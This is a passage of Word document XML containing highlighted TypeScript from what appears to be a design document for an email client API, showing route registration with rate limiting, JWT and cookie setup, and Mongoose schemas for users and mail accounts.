          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    max</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timeWindow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'1 minute'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    keyGenerator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (req) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> req</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">||</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'anonymous'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register</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(jwt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    secret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OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">!,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { cookieName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'refreshToken'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> signed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register</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(cookie)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Health checks</w:t>
      </w:r>
      <w:r>
        <w:br/>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register</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(healthRoutes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { prefix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'/health'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> })</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// API routes v1</w:t>
      </w:r>
      <w:r>
        <w:br/>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register</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(authRoutes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { prefix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'/api/v1/auth'</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register</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(emailRoutes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { prefix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'/api/v1/emails'</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register</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(folderRoutes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { prefix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'/api/v1/folders'</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register</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(attachmentRoutes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { prefix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'/api/v1/attachments'</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register</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(composeRoutes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { prefix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'/api/v1/compose'</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register</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(contactRoutes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { prefix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'/api/v1/contacts'</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register</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(calendarRoutes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { prefix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'/api/v1/calendar'</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app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="180"/>
    <w:bookmarkStart w:id="181" w:name="mongoose-schemas"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.2.2 Mongoose Schemas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/api/src/models/User.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongoose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'mongoose'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> AccountSchema </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongoose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  email</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provider</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enum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'imap'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'gmail_oauth'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'microsoft_oauth'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</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imapHost</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imapPort</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Number</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DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">993</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  imapSecure</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Boolean</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smtpHost</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smtpPort</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Number</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DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">587</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  smtpSecure</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Boolean</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credentialsEncrypted</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syncState</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    lastUid</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Number</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lastSyncAt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highestModSeq</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createdAt</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BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">now</w:t>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 _id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KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> UserSchema </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongoose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  username</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unique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passwordHash</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accounts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [AccountSchema]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  preferences</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    theme</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enum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'light'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'dark'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'system'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'system'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    density</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enum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'compact'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'comfortable'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'comfortable'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    signature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createdAt</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BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">now</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  updatedAt</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BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">now</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mongoose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">model</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'User'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> UserSchema)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/api/src/models/Email.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
